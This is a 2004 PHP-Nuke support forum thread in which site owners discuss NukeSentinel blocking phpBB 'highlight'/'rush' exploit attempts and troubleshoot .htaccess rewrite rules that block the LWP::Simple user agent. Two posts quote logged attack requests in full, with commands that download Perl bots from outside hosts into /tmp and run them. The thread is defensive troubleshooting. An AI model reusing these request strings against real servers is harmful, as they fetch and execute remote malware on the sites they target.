| Author |
Message |
TheosEleos
Life Cycles Becoming CPU Cycles
Joined: Sep 18, 2003
Posts: 960
Location: Missouri
|
 Posted:
Fri Dec 24, 2004 9:34 am |
|
|
  
 |
|
Raven
Site Admin/Owner
Joined: Aug 27, 2002
Posts: 17088
|
| Posted:
Fri Dec 24, 2004 9:37 am |
|
|
|
|
|
coldblooded
New Member
Joined: Jul 05, 2004
Posts: 11
Location: Right here
|
| Posted:
Fri Dec 24, 2004 12:15 pm |
|
They've been hammering on our forums with a combination on highlight and rush scripts, every couple minutes or so, for the last 12 hours from a variety of IPs. Sentinel is easily one of the most important projects for Nuke to come out.  |
| |
|
|
|
|
blarneystone
Client
Joined: Sep 18, 2004
Posts: 62
|
| Posted:
Fri Dec 24, 2004 12:34 pm |
|
371 Attack attempts on my site so far TODAY! Sentinal stopped every one
Thanks for a great utility!  |
| |
|
|
|
|
Raven
|
| Posted:
Fri Dec 24, 2004 2:14 pm |
|
Add this line to your .htaccess in the list of bots that you block at the end, so that
RewriteCond %{HTTP_USER_AGENT} ^Zeus
becomes
RewriteCond %{HTTP_USER_AGENT} ^LWP::Simple [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^Zeus
RewriteRule ^.*$ emailsforyou.php [L]
Now you may have a different RewriteRule. |
| |
|
|
|
|
CurtisH
Life Cycles Becoming CPU Cycles
Joined: Mar 15, 2004
Posts: 638
Location: West Branch, MI
|
| Posted:
Fri Dec 24, 2004 3:13 pm |
|
| coldblooded wrote: | | They've been hammering on our forums with a combination on highlight and rush scripts, every couple minutes or so, for the last 12 hours from a variety of IPs. Sentinel is easily one of the most important projects for Nuke to come out. |
I have had over 100 of these attempts today, different IP each time. Is this the santy thing or are these individuals?
User ID: Anonymous (1)
Reason: Abuse-Script
--------------------
User Agent: LWP::Simple/5.803
Query String: curtishancock.net/modules.php?name=Forums&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;wget%20civa.org/pdf/bot;perl%20bot;wget%20civa.org/pdf/ssh.a;perl%20ssh.a%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527 |
_________________
Those who dream by day are cognizant of many things which escape those who dream only by night. ~Poe |
|
|
|
Raven
|
| Posted:
Fri Dec 24, 2004 3:18 pm |
|
If it's not, it's a carbon copy. It's trying to exploit phpbb so I imagine it is. |
| |
|
|
|
|
montego
Site Admin
Joined: Aug 29, 2004
Posts: 9457
Location: Arizona
|
| Posted:
Sat Dec 25, 2004 6:11 pm |
|
Raven,
I am new to modifying .htaccess. Sentinel is adding the deny's at the end of the file. Do we place the Rewrite commands in front of where Sentinel has started to write the deny statements?
Thanks for the help! Getting concerned with how these guys even found my site. I thought I was careful to keep it out of the search engines. It is strictly a family site. Bummer... wish these guys would put their skills to "good" rather than all this stupid mayhem...
TIA,
montego |
| |
|
|
|
|
PHrEEkie
Subject Matter Expert
Joined: Feb 23, 2004
Posts: 358
|
| Posted:
Sat Dec 25, 2004 7:27 pm |
|
Put it at the top, then a space between it and where Sentinal has started adding IP's. Make sure to have the blank space at the end of the Sentinal bans so that it can continue adding them.
PHrEEk |
_________________
PHP - Breaking your legacy scripts one build at a time. |
|
|
|
|
montego
|
| Posted:
Sat Dec 25, 2004 8:36 pm |
|
Well, the following is NOT stopping the abuse attempts. I am still getting the emails from Sentinel still. Not sure what is wrong. Is there another setting that I may have to turn on in the .htaccess file to get it to work?
Here is what I currently have in my .htaccess file:
Code:
RewriteEngine on
#The next lines check for Spammers Robots and redirect them to a fake page
RewriteCond %{HTTP_USER_AGENT} ^LWP [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^Zeus
RewriteRule ^.*$ScriptViolation.php [L]
RewriteEngine Off
|
The user agent is showing up as User Agent: LWP::Simple in my Sentinel emails. Does this sound like Apache isn't doing what I am trying to tell it to do?
TIA,
montego |
| |
|
|
|
|
Raven
|
| Posted:
Sat Dec 25, 2004 8:56 pm |
|
Try changing [NC,OR] to [NC, OR] |
| |
|
|
|
|
PHrEEkie
|
| Posted:
Sat Dec 25, 2004 8:59 pm |
|
Apache needs to have mod_rewrite enabled, but that's fairly standard stuff.. can't imagine a host having that disabled, but then again, nothing really surprises me anymore... lol
PHrEEk |
| |
|
|
|
|
Raven
|
| Posted:
Sat Dec 25, 2004 9:05 pm |
|
Great point. I just take that for granted |
| |
|
|
|
|
montego
|
| Posted:
Sun Dec 26, 2004 8:01 am |
|
Does apache have to be restarted after I change the .htaccess file? I just verified that my Hosting company just upgraded to 4.3.10 PHP (just this morning!) and it does have mod_rewrite module as a loaded module. Does this mean it should be enabled?
Also, strangly enough, after I updated my .htaccess file last night, Sentinel stopped writing IP addresses to it. The "kiddies" are still getting banned but I am losing server-level protection... I don't like that idea. Hence my question about restarting Apache OR if I need to do something in Sentinel to get it to log again?
You guys are great!
montego |
| |
|
|
|
|
Raven
|
| Posted:
Sun Dec 26, 2004 8:25 am |
|
No on restarting Apache. NukeSentinel never sees these now because they are blocked at the server level. |
| |
|
|
|
|
montego
|
| Posted:
Sun Dec 26, 2004 8:29 am |
|
Raven, but I am still getting emails from Sentinel on these exact same abuses... as mentioned in my post. How can this be? |
| |
|
|
|
|
Raven
|
| Posted:
Sun Dec 26, 2004 8:33 am |
|
Since, for some yet unknown reason, the .htaccess code is not working on your site, NukeSentinel is still protecting you  . Do you have the .htaccess code at the very top of your .htaccess? |
| |
|
|
|
|
montego
|
| Posted:
Sun Dec 26, 2004 8:38 am |
|
I will PM you with my .htaccess code up to where the IP addresses were getting added. Sorry for being such a pest. It is just so unnerving to have someone going after me and my family! |
| |
|
|
|
|
Raven
|
| Posted:
Sun Dec 26, 2004 8:42 am |
|
Hopefully the changes you mentioned will work! |
| |
|
|
|
|
montego
|
| Posted:
Sun Dec 26, 2004 9:03 am |
|
Uuuuggghhhhh.... they just tried again! I just don't understand why .htaccess is not working as expected. Here is the attack email text:
Code:
Date & Time: 2004-12-26 07:00:22
Blocked IP: 69.44.153.*
User ID: Anonymous (1)
Reason: Abuse-Filter
--------------------
User Agent: LWP::Simple/5.65
Query String:
mysite.com/modules.php?name=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt
Forwarded For: none
Client IP: none
Remote Address: 69.44.153.20
Remote Port: 37526
Request Method: GET
|
Any thoughts? I just cannot see why the .htaccess commands are not working. I am going to have to submit a ticket to my web host!
UUUgggghhhhh |
| |
|
|
|
|
montego
|
| Posted:
Sun Dec 26, 2004 9:54 am |
|
Contacted my web hosting company. They made it sound like they had to make a chg to the conf file to enable rewrite! They have done so now, so we'll now see if this blasted code finally works for me. 
Sure appreciate everyone's help on this. Such a pain. Hopefully all the work on this recently will help improve many of our skills in addressing these issues ourselves in the future. I have certainly learned a thing of two.
If you do not hear back from me, Raven, then you'll know it is working. So far so good...
montego |
| |
|
|
|
|
|
|
![[Valid RSS]](https://www.ravenphpscripts.com/images/valid-rss.png "Validate my RSS feed"){kind=small}
